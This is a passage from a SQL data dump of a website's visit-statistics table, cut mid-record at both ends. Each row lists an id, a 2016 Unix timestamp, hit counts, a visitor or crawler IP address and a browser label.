2,0,'66.249.66.185',''),(52487,1469591299,1,1,0,0,'66.249.66.177','chrome'),(52488,1469591752,1,1,0,0,'195.154.183.187','chrome'),(52489,1469591785,1,1,0,0,'82.145.220.169','chrome'),(52490,1469592866,1,1,0,0,'212.55.84.26','chrome'),(52491,1469592990,1,1,0,0,'91.196.178.97','chrome'),(52492,1469593486,1,1,0,0,'164.132.161.83','other'),(52493,1469594078,1,1,0,0,'37.73.206.140','chrome'),(52494,1469594843,1,0,1,0,'66.249.69.185',''),(52495,1469595242,1,1,0,0,'151.80.31.172','other'),(52496,1469595592,1,1,0,0,'91.196.178.167','other'),(52497,1469595971,1,1,0,0,'164.132.161.48','other'),(52498,1469596012,1,1,0,0,'141.8.142.61','other'),(52499,1469596219,1,1,0,0,'141.8.183.19','other'),(52500,1469596300,1,0,1,0,'66.249.66.177',''),(52501,1469596447,1,0,1,0,'66.249.66.182',''),(52502,1469596875,1,1,0,0,'93.158.152.46','other'),(52503,1469597231,1,0,1,0,'66.249.66.180',''),(52504,1469597967,1,1,0,0,'5.255.253.26','other'),(52505,1469598090,1,1,0,0,'130.193.51.19','other'),(52506,1469598232,1,1,0,0,'130.193.50.34','other'),(52507,1469598284,1,0,1,0,'66.249.66.180',''),(52508,1469599334,1,0,1,0,'66.249.66.183',''),(52509,1469599521,1,1,0,0,'37.55.239.57','opera'),(52510,1469599689,1,0,1,0,'66.249.66.188',''),(52511,1469599790,1,1,0,0,'66.249.83.244','chrome'),(52512,1469600261,1,1,0,0,'37.55.205.116','chrome'),(52513,1469600298,1,1,0,0,'164.132.161.59','other'),(52514,1469600716,1,1,0,0,'91.196.178.40','firefox'),(52515,1469600974,1,1,0,0,'37.53.93.189','chrome'),(52516,1469601393,1,1,0,0,'37.73.239.57','chrome'),(52517,1469602319,1,1,0,0,'66.249.66.185','chrome'),(52518,1469602669,1,1,0,0,'78.111.185.8','firefox'),(52519,1469603486,1,1,0,0,'130.180.210.220','chrome'),(52520,1469603783,1,1,0,0,'91.196.178.69','firefox'),(52521,1469604186,1,1,0,0,'94.231.188.26','chrome'),(52522,1469604700,1,1,0,0,'51.255.65.84','other'),(52523,1469604948,1,1,0,0,'178.94.172.77','chrome'),(52524,1469604963,1,0,1,0,'68.180.230.178',''),(52525,1469605325,1,1,0,0,'130.180.220.147','firefox'),(52526,1469605386,1,1,0,0,'51.255.65.78','other'),(52527,1469605983,1,1,0,0,'193.34.172.114','chrome'),(52528,1469606628,1,1,0,0,'212.55.84.26','chrome'),(52529,1469606941,1,1,0,0,'91.196.178.161','chrome'),(52530,1469607182,1,1,0,0,'37.53.231.190','chrome'),(52531,1469607219,1,0,1,0,'66.249.66.188',''),(52532,1469607631,1,1,0,0,'193.29.204.4','other'),(52533,1469608113,1,1,0,0,'141.8.132.30','other'),(52534,1469608238,1,1,0,0,'95.135.39.157','chrome'),(52535,1469608348,1,1,0,0,'51.255.65.2','other'),(52536,1469608384,1,1,0,0,'92.52.188.244','chrome'),(52537,1469608850,2,0,2,0,'66.249.66.188',''),(52538,1469608858,1,1,0,0,'82.145.209.23','other'),(52539,1469609287,1,1,0,0,'91.204.85.11','chrome'),(52540,1469609968,2,2,0,0,'174.129.237.157','other'),(52541,1469610152,1,0,1,0,'66.249.66.182',''),(52542,1469610194,2,2,0,0,'130.180.216.121','firefox'),(52543,1469610538,1,1,0,0,'164.132.161.74','other'),(52544,1469610547,2,0,2,0,'66.249.66.188',''),(52545,1469610959,1,1,0,0,'174.129.237.157','other'),(52546,1469611447,1,0,1,0,'66.249.66.177',''),(52547,1469611657,1,1,0,0,'164.132.161.83','other'),(52548,1469611659,2,0,2,0,'66.249.66.185',''),(52549,1469611749,1,1,0,0,'51.255.65.42','other'),(52550,1469611823,1,0,1,0,'66.249.66.182',''),(52551,1469612005,3,3,0,0,'130.193.50.34','other'),(52552,1469612046,1,1,0,0,'180.76.15.158','other'),(52553,1469612140,1,1,0,0,'141.8.142.58','other'),(52554,1469612454,1,0,1,0,'66.249.69.189',''),(52555,1469612547,1,1,0,0,'51.255.65.70','other'),(52556,1469612579,1,0,1,0,'66.249.66.183',''),(52557,1469612903,11,11,0,0,'136.243.152.18','other'),(52558,1469612986,1,0,1,0,'66.249.66.180',''),(52559,1469613446,2,0,2,0,'66.249.66.188',''),(52560,1469613970,1,1,0,0,'174.129.237.157','other'),(52561,1469614304,1,1,0,0,'164.132.161.34','other'),(52562,1469614555,1,0,1,0,'66.249.66.185',''),(52563,1469614595,2,2,0,0,'78.111.190.47','firefox'),(52564,1469615004,1,1,0,0,'195.138.166.146','chrome'),(52565,1469615803,1,0,1,0,'66.249.69.187',''),(52566,1469615926,1,1,0,0,'174.129.237.157','other'),(52567,1469616519,1,1,0,0,'164.132.161.18','other'),(52568,1469616733,1,1,0,0,'91.196.178.70','chrome'),(52569,1469616895,1,1,0,0,'178.92.8.200','chrome'),(52570,1469616967,1,1,0,0,'91.196.178.69','firefox'),(52571,1469617083,1,0,1,0,'66.249.66.182',''),(52572,1469617583,1,1,0,0,'66.249.69.149','chrome'),(52573,1469617662,1,1,0,0,'66.249.66.182','chrome'),(52574,1469617766,1,0,1,0,'66.249.66.177',''),(52575,1469618009,1,1,0,0,'130.180.216.87','firefox'),(52576,1469619050,1,0,1,0,'66.249.66.185',''),(52577,1469619121,2,2,0,0,'130.180.216.87','firefox'),(52578,1469619735,1,1,0,0,'37.54.60.104','chrome'),(52579,1469619803,1,1,0,0,'212.55.84.26','chrome'),(52580,1469619827,1,1,0,0,'91.196.178.70','chrome'),(52581,1469619899,1,0,1,0,'66.249.69.189',''),(52582,1469620626,1,1,0,0,'46.201.92.253','chrome'),(52583,1469620649,1,1,0,0,'93.158.152.40','other'),(52584,1469620652,1,1,0,0,'178.154.149.11','other'),(52585,1469620919,2,2,0,0,'130.180.220.93','firefox'),(52586,1469621047,1,1,0,0,'82.145.211.85','other'),(52587,1469621048,1,1,0,0,'141.0.15.201','other'),(52588,1469621217,1,0,1,0,'66.249.66.188',''),(52589,1469621318,1,0,1,0,'66.249.66.177',''),(52590,1469621334,1,1,0,0,'51.255.65.84','other'),(52591,1469621409,1,1,0,0,'95.133.238.235','other'),(52592,1469621457,1,1,0,0,'212.55.84.26','chrome'),(52593,1469621730,1,1,0,0,'164.132.161.3','other'),(52594,1469621880,1,1,0,0,'195.140.160.30','firefox'),(52595,1469621885,1,1,0,0,'141.8.142.25','other'),(52596,1469622091,1,1,0,0,'37.73.208.49','chrome'),(52597,1469622158,1,1,0,0,'164.132.161.29','other'),(52598,1469622338,1,1,0,0,'91.196.178.68','firefox'),(52599,1469622339,1,1,0,0,'91.195.156.46','firefox'),(52600,1469622367,1,1,0,0,'180.76.15.135','other'),(52601,1469622446,1,1,0,0,'107.21.1.8','other'),(52602,1469622474,24,24,0,0,'95.158.189.118','other'),(52603,1469622526,1,0,1,0,'66.249.66.188',''),(52604,1469622538,1,0,1,0,'66.249.66.185',''),(52605,1469622744,4,4,0,0,'130.180.220.159','firefox'),(52606,1469622776,1,1,0,0,'91.196.178.129','chrome'),(52607,1469622853,1,1,0,0,'94.178.146.58','chrome'),(52608,1469623450,14,14,0,0,'95.158.189.118','other'),(52609,1469623675,2,2,0,0,'130.180.220.159','firefox'),(52610,1469623694,1,0,1,0,'66.249.66.185',''),(52611,1469623994,1,1,0,0,'92.112.75.37','chrome'),(52612,1469625207,173,173,0,0,'69.30.198.178','other'),(52613,1469625389,1,1,0,0,'51.255.65.53','other'),(52614,1469625634,1,0,1,0,'66.249.66.183',''),(52615,1469625827,1,1,0,0,'91.196.89.4','chrome'),(52616,1469625887,1,0,1,0,'66.249.66.177',''),(52617,1469626112,4,4,0,0,'69.30.198.178','other'),(52618,1469626139,1,1,0,0,'37.53.122.15','chrome'),(52619,1469627025,1,1,0,0,'82.145.209.92','other'),(52620,1469627298,1,0,1,0,'66.249.66.180',''),(52621,1469627414,1,1,0,0,'91.196.178.104','other'),(52622,1469627711,1,1,0,0,'91.196.177.15','chrome'),(52623,1469627775,1,1,0,0,'37.53.122.15','chrome'),(52624,1469628197,1,1,0,0,'91.196.178.69','firefox'),(52625,1469628736,1,1,0,0,'66.249.81.202','chrome'),(52626,1469628805,38,38,0,0,'95.158.189.118','other'),(52627,1469628937,1,1,0,0,'37.53.122.15','chrome'),(52628,1469629057,1,1,0,0,'164.132.161.94','other'),(52629,1469629286,1,1,0,0,'91.124.238.64','chrome'),(52630,1469629841,1,0,1,0,'66.249.66.185',''),(52631,1469631535,1,1,0,0,'51.255.65.54','other'),(52632,1469632222,1,1,0,0,'188.163.108.232','firefox'),(52633,1469632664,1,1,0,0,'66.249.66.182','chrome'),(52634,1469633305,1,1,0,0,'66.249.66.185','chrome'),(52635,1469633717,1,0,1,0,'66.249.66.180',''),(52636,1469634840,1,1,0,0,'213.5.193.38','chrome'),(52637,1469634855,1,1,0,0,'94.179.25.93','chrome'),(52638,1469635340,1,0,1,0,'66.249.66.177',''),(52639,1469635461,1,1,0,0,'51.255.65.42','other'),(52640,1469636413,1,1,0,0,'66.249.93.113','chrome'),(52641,1469636601,1,1,0,0,'51.255.65.34','other'),(52642,1469636726,1,1,0,0,'157.55.39.142','other'),(52643,1469637306,1,0,1,0,'66.249.66.182',''),(52644,1469637559,1,1,0,0,'51.255.65.50','other'),(52645,1469637628,1,1,0,0,'91.196.178.68','firefox'),(52646,1469639548,1,1,0,0,'180.76.15.162','other'),(52647,1469640330,1,1,0,0,'193.194.124.5','chrome'),(52648,1469640621,1,1,0,0,'180.76.15.33','other'),(52649,1469640874,1,1,0,0,'164.132.161.9','other'),(52650,1469642100,1,1,0,0,'207.46.13.55','other'),(52651,1469642310,1,1,0,0,'151.80.31.174','other'),(52652,1469642903,1,0,1,0,'66.249.66.188',''),(52653,1469643256,1,1,0,0,'178.93.149.111','chrome'),(52654,1469643286,1,1,0,0,'141.8.183.25','other'),(52655,1469643567,1,1,0,0,'180.76.15.24','other'),(52656,1469643568,1,1,0,0,'180.76.15.30','other'),(52657,1469645955,1,1,0,0,'66.249.93.117','chrome'),(52658,1469646340,1,1,0,0,'151.80.31.164','other'),(52659,1469647076,1,1,0,0,'66.249.66.180','chrome'),(52660,1469647439,1,1,0,0,'91.196.178.69','chrome'),(52661,1469647743,1,1,0,0,'91.196.178.168','chrome'),(52662,1469648204,1,1,0,0,'66.249.66.185','chrome'),(52663,1469648376,1,1,0,0,'208.115.113.82','other'),(52664,1469648378,1,0,1,0,'66.249.66.182',''),(52665,1469649063,1,1,0,0,'164.132.161.14','other'),(52666,1469649887,1,1,0,0,'151.80.31.181','other'),(52667,1469651553,1,1,0,0,'91.196.178.165','firefox'),(52668,1469651623,1,1,0,0,'91.196.178.72','other'),(52669,1469651676,1,1,0,0,'164.132.161.5','other'),(52670,1469652118,1,0,1,0,'66.249.66.188',''),(52671,1469652144,1,0,1,0,'66.249.66.185',''),(52672,1469652494,2,2,0,0,'178.93.169.31','chrome'),(52673,1469653089,1,0,1,0,'66.249.66.182',''),(52674,1469653692,1,1,0,0,'193.194.125.253','chrome'),(52675,1469653717,1,0,1,0,'66.249.66.180',''),(52676,1469654687,1,0,1,0,'66.249.66.185',''),(52677,1469655099,1,1,0,0,'94.179.120.83','firefox'),(52678,1469655125,1,1,0,0,'51.255.65.80','other'),(52679,1469655251,1,1,0,0,'37.53.246.150','chrome'),(52680,1469656062,1,1,0,0,'66.249.66.185','chrome'),(52681,1469656846,1,1,0,0,'164.132.161.61','other'),(52682,1469657464,1,1,0,0,'207.46.13.55','other'),(52683,1469658035,1,1,0,0,'95.158.49.243','other'),(52684,1469659234,1,0,1,0,'66.249.66.185',''),(52685,1469660354,1,1,0,0,'164.132.161.7','other'),(52686,1469660383,1,0,1,0,'66.249.66.183',''),(52687,1469661285,1,0,1,0,'66.249.66.182',''),(52688,1469663452,1,1,0,0,'37.73.244.218','other'),(52689,1469664055,1,1,0,0,'51.255.65.38','other'),(52690,1469664360,1,1,0,0,'51.255.65.69','other'),(52691,1469665480,1,1,0,0,'207.46.13.55','other'),(52692,1469665592,1,0,1,0,'66.249.66.182',''),(52693,1469665686,1,0,1,0,'66.249.66.171',''),(52694,1469665770,1,1,0,0,'157.55.39.239','other'),(52695,1469666478,1,1,0,0,'208.115.113.92','other'),(52696,1469667509,1,0,1,0,'66.249.66.180',''),(52697,1469668363,1,1,0,0,'66.249.66.151','chrome'),(52698,1469669135,1,0,1,0,'66.249.66.180',''),(52699,1469669191,1,1,0,0,'208.115.113.92','other'),(52700,1469669245,1,0,1,0,'66.249.66.183',''),(52701,1469670810,1,1,0,0,'151.80.31.173','other'),(52702,1469671937,1,0,1,0,'66.249.66.180',''),(52703,1469673095,300,300,0,0,'5.9.89.170','other'),(52704,1469673713,1,1,0,0,'37.73.247.72','other'),(52705,1469673836,116,116,0,0,'89.221.208.77','other'),(52706,1469674088,1,0,1,0,'66.249.66.182',''),(52707,1469674741,121,121,0,0,'89.221.208.77','other'),(52708,1469675181,1,1,0,0,'180.76.15.20','other'),(52709,1469675642,14,14,0,0,'89.221.208.77','other'),(52710,1469675975,1,1,0,0,'178.94.172.77','chrome'),(52711,1469676219,1,1,0,0,'51.255.65.44','other'),(52712,1469677745,1,0,1,0,'66.249.66.188',''),(52713,1469677798,1,1,0,0,'217.77.215.236','chrome'),(52714,1469678247,1,1,0,0,'66.249.66.182','chrome'),(52715,1469678357,1,1,0,0,'66.249.66.183','chrome'),(52716,1469678392,1,1,0,0,'40.77.167.32','other'),(52717,1469678806,1,1,0,0,'87.228.55.193','firefox'),(52718,1469679188,1,1,0,0,'54.244.48.9','msie'),(52719,1469679197,2,0,2,0,'66.249.66.177',''),(52720,1469679301,1,1,0,0,'51.255.65.68','other'),(52721,1469680087,1,1,0,0,'91.196.178.70','chrome'),(52722,1469680108,1,1,0,0,'141.8.142.58','other'),(52723,1469680524,1,1,0,0,'180.76.15.145','other'),(52724,1469680547,1,0,1,0,'66.249.66.188',''),(52725,1469680948,1,1,0,0,'91.121.109.55','other'),(52726,1469681826,1,1,0,0,'141.0.15.220','other'),(52727,1469683195,1,1,0,0,'66.102.9.93','chrome'),(52728,1469683272,1,0,1,0,'66.249.66.188',''),(52729,1469683603,1,1,0,0,'91.196.178.40','firefox'),(52730,1469683793,1,0,1,0,'66.249.66.180',''),(52731,1469683928,1,1,0,0,'91.196.178.68','firefox'),(52732,1469684021,1,0,1,0,'66.249.66.185',''),(52733,1469684225,1,1,0,0,'91.196.178.68','chrome'),(52734,1469684608,1,1,0,0,'91.196.178.40','firefox'),(52735,1469684651,1,1,0,0,'51.255.65.20','other'),(52736,1469684678,1,0,1,0,'66.249.66.183',''),(52737,1469684781,1,1,0,0,'164.132.161.26','other'),(52738,1469684862,1,0,1,0,'66.249.69.189',''),(52739,1469685748,1,1,0,0,'212.55.84.26','chrome'),(52740,1469685829,1,1,0,0,'164.132.161.69','other'),(52741,1469685932,1,1,0,0,'91.196.178.40','firefox'),(52742,1469686191,1,1,0,0,'37.55.59.57','other'),(52743,1469686981,1,1,0,0,'51.255.65.47','other'),(52744,1469686991,2,2,0,0,'95.108.142.31','other'),(52745,1469686995,6,6,0,0,'141.8.183.25','other'),(52746,1469687002,3,3,0,0,'130.193.51.19','other'),(52747,1469687006,2,2,0,0,'130.193.50.34','other'),(52748,1469687015,1,1,0,0,'141.8.142.58','other'),(52749,1469687103,1,1,0,0,'94.179.38.195','firefox'),(52750,1469687764,1,0,1,0,'66.249.66.180',''),(52751,1469687929,1,1,0,0,'130.193.50.34','other'),(52752,1469687983,1,1,0,0,'91.196.178.168','chrome'),(52753,1469687985,1,1,0,0,'94.179.104.26','chrome'),(52754,1469688004,1,1,0,0,'95.135.89.121','other'),(52755,1469688143,1,1,0,0,'95.132.68.57','chrome'),(52756,1469688153,1,1,0,0,'94.179.38.195','firefox'),(52757,1469688178,1,1,0,0,'91.196.177.94','chrome'),(52758,1469688431,1,1,0,0,'178.92.250.212','chrome'),(52759,1469688624,1,1,0,0,'207.46.13.102','other'),(52760,1469688725,1,1,0,0,'91.196.178.71','firefox'),(52761,1469688861,1,1,0,0,'91.196.179.134','chrome'),(52762,1469689343,1,1,0,0,'195.149.70.22','firefox'),(52763,1469689413,1,1,0,0,'164.132.161.69','other'),(52764,1469689737,1,1,0,0,'78.111.190.254','chrome'),(52765,1469689822,1,0,1,0,'66.249.66.182',''),(52766,1469689831,1,1,0,0,'91.196.177.20','firefox'),(52767,1469689905,1,1,0,0,'37.54.21.84','chrome'),(52768,1469690384,1,1,0,0,'91.196.178.40','firefox'),(52769,1469690969,1,1,0,0,'91.196.178.162','chrome'),(52770,1469691218,1,1,0,0,'94.179.35.79','chrome'),(52771,1469691302,4,4,0,0,'51.254.32.67','other'),(52772,1469691638,1,1,0,0,'37.54.18.3','firefox'),(52773,1469691647,1,1,0,0,'94.179.86.14','chrome'),(52774,1469691674,1,1,0,0,'130.180.212.62','chrome'),(52775,1469691752,1,1,0,0,'208.115.113.82','other'),(52776,1469691936,1,1,0,0,'66.102.9.93','chrome'),(52777,1469692449,1,1,0,0,'180.76.15.13','other'),(52778,1469692976,1,1,0,0,'51.255.65.74','other'),(52779,1469693250,1,1,0,0,'94.179.110.79','chrome'),(52780,1469693420,1,1,0,0,'164.132.161.96','other'),(52781,1469693640,5,5,0,0,'173.234.159.250','other'),(52782,1469693652,1,1,0,0,'91.196.178.71','firefox'),(52783,1469694027,1,0,1,0,'68.180.230.111',''),(52784,1469694166,1,1,0,0,'176.106.5.130','chrome'),(52785,1469694747,2,2,0,0,'5.9.111.70','other'),(52786,1469694856,1,1,0,0,'91.196.178.131','firefox'),(52787,1469694897,1,1,0,0,'91.196.178.67','chrome'),(52788,1469695177,1,1,0,0,'91.196.178.71','chrome'),(52789,1469695551,1,0,1,0,'66.249.66.185',''),(52790,1469695869,1,0,1,0,'68.180.230.111',''),(52791,1469695914,1,1,0,0,'176.241.109.84','firefox'),(52792,1469696107,1,1,0,0,'91.196.179.33','firefox'),(52793,1469696140,1,1,0,0,'91.196.178.71','firefox'),(52794,1469696326,1,0,1,0,'66.249.66.177',''),(52795,1469696370,1,1,0,0,'91.196.178.72','chrome'),(52796,1469696506,1,1,0,0,'91.124.2.124','firefox'),(52797,1469696533,1,1,0,0,'91.234.79.87','firefox'),(52798,1469696813,1,0,1,0,'66.249.66.180',''),(52799,1469697050,1,1,0,0,'151.80.31.102','other'),(52800,1469697438,1,0,1,0,'66.249.66.177',''),(52801,1469697443,1,1,0,0,'91.196.178.71','firefox'),(52802,1469698210,1,1,0,0,'164.132.161.39','other'),(52803,1469698286,2,2,0,0,'89.163.148.22','other'),(52804,1469698341,1,1,0,0,'91.196.178.39','chrome'),(52805,1469698555,1,1,0,0,'91.196.178.71','firefox'),(52806,1469698766,1,1,0,0,'91.124.2.124','firefox'),(52807,1469698769,1,1,0,0,'51.255.65.58','other'),(52808,1469698799,1,1,0,0,'91.196.178.98','firefox'),(52809,1469698877,1,1,0,0,'91.196.178.72','chrome'),(52810,1469698975,1,1,0,0,'164.132.161.78','other'),(52811,1469699055,1,1,0,0,'37.73.182.110','chrome'),(52812,1469699120,1,0,1,0,'66.249.66.182',''),(52813,1469699129,1,1,0,0,'164.132.161.40','other'),(52814,1469699139,1,1,0,0,'180.76.15.10','other'),(52815,1469699644,1,1,0,0,'164.132.161.79','other'),(52816,1469699777,1,1,0,0,'94.179.85.216','chrome'),(52817,1469699785,1,1,0,0,'91.196.178.71','firefox'),(52818,1469699791,1,1,0,0,'130.193.50.34','other'),(52819,1469700111,1,1,0,0,'91.196.177.134','chrome'),(52820,1469700999,1,1,0,0,'188.163.73.139','chrome'),(52821,1469701460,1,0,1,0,'66.249.66.180',''),(52822,1469701545,1,1,0,0,'212.55.84.26','chrome'),(52823,1469701717,1,1,0,0,'178.93.144.214','chrome'),(52824,1469701721,1,0,1,0,'66.249.66.188',''),(52825,1469701753,1,1,0,0,'91.196.178.104','chrome'),(52826,1469702104,1,1,0,0,'95.132.71.154','other'),(52827,1469702457,2,0,2,0,'68.180.230.178',''),(52828,1469702524,1,0,1,0,'66.249.66.185',''),(52829,1469702560,1,1,0,0,'193.151.14.37','chrome'),(52830,1469702788,1,1,0,0,'91.196.178.70','chrome'),(52831,1469703495,1,1,0,0,'94.178.146.126','firefox'),(52832,1469703642,1,1,0,0,'91.196.178.101','chrome'),(52833,1469703912,1,1,0,0,'91.196.178.168','other'),(52834,1469704170,1,1,0,0,'66.249.69.185','chrome'),(52835,1469704315,1,1,0,0,'91.196.178.134','chrome'),(52836,1469704621,1,1,0,0,'94.179.95.86','chrome'),(52837,1469704681,1,0,1,0,'68.180.230.178',''),(52838,1469705537,1,1,0,0,'178.92.8.200','chrome'),(52839,1469705935,1,1,0,0,'208.115.113.82','other'),(52840,1469706022,1,0,1,0,'68.180.230.111',''),(52841,1469706044,2,2,0,0,'91.196.178.69','firefox'),(52842,1469706286,1,1,0,0,'91.196.178.71','firefox'),(52843,1469706828,1,0,1,0,'68.180.230.178',''),(52844,1469707831,1,1,0,0,'91.196.178.98','chrome'),(52845,1469708168,1,1,0,0,'91.196.178.69','chrome'),(52846,1469708281,1,1,0,0,'217.196.168.65','firefox'),(52847,1469708896,1,1,0,0,'37.73.130.113','other'),(52848,1469709611,1,1,0,0,'208.115.113.92','other'),(52849,1469709784,1,1,0,0,'91.196.178.136','other'),(52850,1469709847,1,1,0,0,'141.8.142.58','other'),(52851,1469709881,1,1,0,0,'134.249.163.89','chrome'),(52852,1469709923,1,1,0,0,'37.52.100.180','firefox'),(52853,1469709931,1,1,0,0,'78.111.186.35','chrome'),(52854,1469710009,1,1,0,0,'91.196.178.98','chrome'),(52855,1469710292,1,1,0,0,'91.196.179.138','firefox'),(52856,1469710405,1,1,0,0,'130.193.51.19','other'),(52857,1469710910,1,1,0,0,'217.77.215.236','chrome'),(52858,1469711300,1,1,0,0,'91.196.179.138','firefox'),(52859,1469711540,1,1,0,0,'95.133.25.56','chrome'),(52860,1469711542,1,1,0,0,'141.8.142.61','other'),(52861,1469711558,2,2,0,0,'130.193.50.34','other'),(52862,1469711793,1,0,1,0,'66.249.66.185',''),(52863,1469712485,1,1,0,0,'91.196.179.138','firefox'),(52864,1469712519,1,1,0,0,'95.133.25.56','chrome'),(52865,1469712570,1,1,0,0,'66.249.93.109','chrome'),(52866,1469712861,1,0,1,0,'66.249.66.180',''),(52867,1469712898,2,0,2,0,'66.249.66.182',''),(52868,1469713037,1,1,0,0,'207.46.13.55','other'),(52869,1469713189,1,1,0,0,'66.249.66.182','chrome'),(52870,1469713279,1,1,0,0,'208.115.113.82','other'),(52871,1469713443,1,1,0,0,'91.196.178.98','chrome'),(52872,1469713669,2,2,0,0,'91.196.178.163','chrome'),(52873,1469713726,1,1,0,0,'69.197.177.50','other'),(52874,1469713936,1,1,0,0,'91.124.15.214','opera'),(52875,1469714055,1,1,0,0,'91.196.176.13','chrome'),(52876,1469714106,1,1,0,0,'85.115.62.180','other'),(52877,1469714466,1,1,0,0,'95.133.31.139','firefox'),(52878,1469714470,1,1,0,0,'130.193.51.19','other'),(52879,1469714495,1,1,0,0,'37.73.221.184','other'),(52880,1469714804,1,1,0,0,'91.196.179.138','firefox'),(52881,1469715440,1,1,0,0,'91.196.177.8','chrome'),(52882,1469715568,1,1,0,0,'91.196.178.71','firefox'),(52883,1469716049,1,1,0,0,'51.255.65.37','other'),(52884,1469716581,1,1,0,0,'157.55.39.239','other'),(52885,1469716803,1,1,0,0,'37.52.114.143','other'),(52886,1469716858,1,1,0,0,'208.115.113.92','other'),(52887,1469717406,1,1,0,0,'130.193.50.34','other'),(52888,1469718018,1,1,0,0,'130.193.51.79','other'),(52889,1469718020,1,1,0,0,'141.8.142.85','other'),(52890,1469718437,1,1,0,0,'91.196.178.167','chrome'),(52891,1469718540,1,1,0,0,'151.80.31.160','other'),(52892,1469718761,1,1,0,0,'91.196.178.66','other'),(52893,1469718764,1,1,0,0,'178.92.8.200','chrome'),(52894,1469719042,1,1,0,0,'91.196.178.71','firefox'),(52895,1469720434,1,1,0,0,'51.255.65.4','other'),(52896,1469721116,1,1,0,0,'93.72.129.64','chrome'),(52897,1469721641,1,1,0,0,'164.132.161.59','other'),(52898,1469722113,1,1,0,0,'66.249.66.185','chrome'),(52899,1469722651,1,1,0,0,'91.196.178.131','firefox'),(52900,1469722873,1,0,1,0,'66.249.66.188',''),(52901,1469722904,1,0,1,0,'66.249.66.180',''),(52902,1469723570,187,187,0,0,'144.76.12.78','other'),(52903,1469723795,1,1,0,0,'51.255.65.81','other'),(52904,1469723995,1,1,0,0,'164.132.161.56','other'),(52905,1469724018,1,1,0,0,'91.196.178.69','chrome'),(52906,1469724387,1,1,0,0,'66.249.66.185','chrome'),(52907,1469725674,1,0,1,0,'66.249.66.188',''),(52908,1469726006,1,0,1,0,'66.249.66.177',''),(52909,1469726892,1,1,0,0,'66.249.69.189','chrome'),(52910,1469727171,1,1,0,0,'91.196.178.103','chrome'),(52911,1469727317,1,1,0,0,'176.37.31.252','chrome'),(52912,1469727318,1,0,1,0,'66.249.66.177',''),(52913,1469727581,1,1,0,0,'208.115.113.82','other'),(52914,1469727873,1,1,0,0,'82.145.219.127','other'),(52915,1469728619,1,1,0,0,'91.196.178.40','chrome'),(52916,1469729151,1,1,0,0,'37.73.180.160','other'),(52917,1469729337,1,0,1,0,'66.249.66.185',''),(52918,1469729810,1,1,0,0,'151.80.31.100','other'),(52919,1469729881,1,1,0,0,'212.22.208.242','chrome'),(52920,1469730508,1,1,0,0,'46.133.48.6','other'),(52921,1469730521,1,1,0,0,'193.108.48.165','chrome'),(52922,1469730553,1,1,0,0,'178.93.148.171','chrome'),(52923,1469730663,1,0,1,0,'66.249.66.188',''),(52924,1469731353,1,1,0,0,'91.196.178.68','chrome'),(52925,1469732280,1,0,1,0,'66.249.66.177',''),(52926,1469732715,4,4,0,0,'69.30.198.242','other'),(52927,1469732953,1,0,1,0,'66.249.66.188',''),(52928,1469733000,3,0,3,0,'66.249.66.185',''),(52929,1469733190,1,1,0,0,'164.132.161.86','other'),(52930,1469733230,2,0,2,0,'66.249.66.182',''),(52931,1469733427,1,0,1,0,'66.249.66.183',''),(52932,1469733814,1,1,0,0,'141.8.183.25','other'),(52933,1469733825,1,1,0,0,'141.8.132.10','other'),(52934,1469733903,1,1,0,0,'130.193.50.34','other'),(52935,1469733951,1,1,0,0,'51.255.65.36','other'),(52936,1469735166,1,1,0,0,'91.196.178.103','other'),(52937,1469735327,1,1,0,0,'141.8.183.25','other'),(52938,1469735460,1,0,1,0,'66.249.69.187',''),(52939,1469735482,4,4,0,0,'138.201.127.112','other'),(52940,1469735791,1,1,0,0,'51.255.65.43','other'),(52941,1469736533,1,1,0,0,'91.196.178.103','other'),(52942,1469736608,1,0,1,0,'66.249.66.185',''),(52943,1469737122,1,0,1,0,'66.249.66.182',''),(52944,1469737275,1,1,0,0,'91.196.178.161','other'),(52945,1469738537,1,1,0,0,'208.115.113.82','other'),(52946,1469738607,1,1,0,0,'91.124.118.216','firefox'),(52947,1469738861,1,0,1,0,'66.249.75.191',''),(52948,1469739073,1,1,0,0,'91.124.183.181','other'),(52949,1469739692,1,0,1,0,'66.249.66.183',''),(52950,1469739746,1,1,0,0,'78.111.185.198','chrome'),(52951,1469740030,1,1,0,0,'213.179.252.239','chrome'),(52952,1469740104,1,1,0,0,'91.124.118.174','chrome'),(52953,1469740517,1,0,1,0,'66.249.66.188',''),(52954,1469740545,1,1,0,0,'51.255.65.64','other'),(52955,1469740740,1,1,0,0,'109.57.174.208','other'),(52956,1469742191,1,0,1,0,'66.249.66.180',''),(52957,1469743280,1,1,0,0,'51.255.65.95','other'),(52958,1469744368,1,0,1,0,'66.249.66.188',''),(52959,1469744399,1,0,1,0,'66.249.66.185',''),(52960,1469745715,1,1,0,0,'93.158.152.84','other'),(52961,1469746013,1,1,0,0,'164.132.161.76','other'),(52962,1469746053,1,1,0,0,'66.249.66.185','chrome'),(52963,1469747079,1,0,1,0,'66.249.66.182',''),(52964,1469747159,1,1,0,0,'51.255.65.5','other'),(52965,1469747300,1,1,0,0,'91.196.178.103','other'),(52966,1469748140,1,0,1,0,'68.180.230.178',''),(52967,1469748307,1,0,1,0,'66.249.66.177',''),(52968,1469748383,2,0,2,0,'66.249.66.185',''),(52969,1469750518,1,0,1,0,'66.249.66.182',''),(52970,1469750573,1,0,1,0,'66.249.66.183',''),(52971,1469750703,1,1,0,0,'91.196.178.164','chrome'),(52972,1469751743,1,0,1,0,'66.249.66.183',''),(52973,1469752952,1,1,0,0,'208.115.113.82','other'),(52974,1469752984,1,0,1,0,'66.249.66.182',''),(52975,1469753101,1,1,0,0,'180.76.15.15','other'),(52976,1469754417,1,1,0,0,'164.132.161.34','other'),(52977,1469754839,1,0,1,0,'66.249.66.182',''),(52978,1469757193,1,0,1,0,'66.249.66.182',''),(52979,1469758763,1,1,0,0,'180.76.15.151','other'),(52980,1469759385,1,1,0,0,'51.255.65.3','other'),(52981,1469760320,2,0,2,0,'66.249.66.182',''),(52982,1469760329,1,0,1,0,'66.249.66.180',''),(52983,1469761008,1,1,0,0,'51.255.65.17','other'),(52984,1469762442,1,1,0,0,'40.77.167.11','other'),(52985,1469763174,1,1,0,0,'141.0.15.17','other'),(52986,1469763419,1,1,0,0,'164.132.161.20','other'),(52987,1469763760,1,1,0,0,'208.115.113.92','other'),(52988,1469763838,1,0,1,0,'66.249.66.177',''),(52989,1469764170,1,1,0,0,'164.132.161.36','other'),(52990,1469765111,1,1,0,0,'37.73.199.41','chrome'),(52991,1469765990,1,1,0,0,'37.73.210.219','other'),(52992,1469767498,1,1,0,0,'195.154.183.187','chrome'),(52993,1469767520,1,0,1,0,'66.249.66.188',''),(52994,14697675